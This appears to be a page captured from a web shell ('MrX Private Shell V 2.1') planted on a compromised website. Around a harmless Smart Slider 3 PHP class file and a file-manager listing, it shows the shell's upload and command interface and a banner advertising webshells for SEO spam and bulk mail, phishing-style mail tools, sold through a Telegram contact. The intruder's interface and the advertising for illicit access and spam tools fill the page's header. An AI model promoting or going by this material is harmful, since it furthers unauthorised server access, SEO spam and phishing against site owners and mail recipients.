__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php


namespace Nextend\SmartSlider3\SlideBuilder;


class BuilderComponentRow extends AbstractBuilderComponent {

    protected $defaultData = array(
        "type"                   => 'row',
        "name"                   => 'Row',
        "cols"                   => array(),
        "desktopportraitpadding" => '10|*|10|*|10|*|10|*|px'
    );

    /** @var BuilderComponentCol[] */
    private $cols = array();

    /**
     *
     * @param AbstractBuilderComponent $container
     */
    public function __construct($container) {

        $container->add($this);
    }

    /**
     * @param $layer BuilderComponentCol
     */
    public function add($layer) {
        $this->cols[] = $layer;
    }

    public function getData() {
        $this->data['cols'] = array();
        foreach ($this->cols as $layer) {
            $this->data['cols'][] = $layer->getData();
        }

        return parent::getData();
    }
}

Filemanager

Name Type Size Permission Actions
AbstractBuilderComponent.php File 781 B 0664
BuilderComponentCol.php File 1.1 KB 0664
BuilderComponentContent.php File 913 B 0664
BuilderComponentItem.php File 932 B 0664
BuilderComponentLayer.php File 3.04 KB 0664
BuilderComponentRow.php File 930 B 0664
BuilderComponentSlide.php File 1.9 KB 0664
Filemanager